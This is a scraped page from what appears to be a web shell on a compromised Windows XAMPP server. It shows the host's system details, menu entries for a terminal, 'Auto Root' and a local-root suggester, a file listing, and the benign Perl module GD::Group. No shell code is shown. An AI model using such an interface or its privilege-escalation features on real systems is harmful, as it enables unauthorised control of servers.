Windows NT KAMIDAKI 10.0 build 19045 (Windows 10) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.3.9
Server IP : 192.168.3.16 & Your IP : 216.73.216.204
Domains :
Cant Read [ /etc/named.conf ]
User : SISTEMA
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
C: /
xampp /
perl /
vendor /
lib /
GD /
Delete
Unzip
Name
Size
Permission
Date
Action
Group.pm
671
B
-rw-rw-rw-
2019-01-10 15:53
Image.pm
4.85
KB
-rw-rw-rw-
2021-01-24 17:46
Polygon.pm
3.93
KB
-rw-rw-rw-
2020-09-24 16:52
Polyline.pm
21.95
KB
-rw-rw-rw-
2019-01-10 15:53
Simple.pm
36.96
KB
-rw-rw-rw-
2019-02-12 13:01
Save
Rename
package GD::Group; =head1 NAME GD::Group - Simple object for recursive grouping =head1 DESCRIPTION Does absolutely nothing with GD, but works nicely with GD::SVG. =cut use strict; our $AUTOLOAD; our $VERSION = 1.00; sub AUTOLOAD { my ($pack,$func_name) = $AUTOLOAD =~ /(.+)::([^:]+)$/; my $this = shift; $this->{gd}->currentGroup($this->{group}); $this->{gd}->$func_name(@_); } sub new { my $this = shift; my ($gd,$group) = @_; return bless {gd => $gd, group => $group},ref $this || $this; } sub DESTROY { my $this = shift; my $gd = $this->{gd}; my $grp = $this->{group}; $gd->endGroup($grp); } 1;